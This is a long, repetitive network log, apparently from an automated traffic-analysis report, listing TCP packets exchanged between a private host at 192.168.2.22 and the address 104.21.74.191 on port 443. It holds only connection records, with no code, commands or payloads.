Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
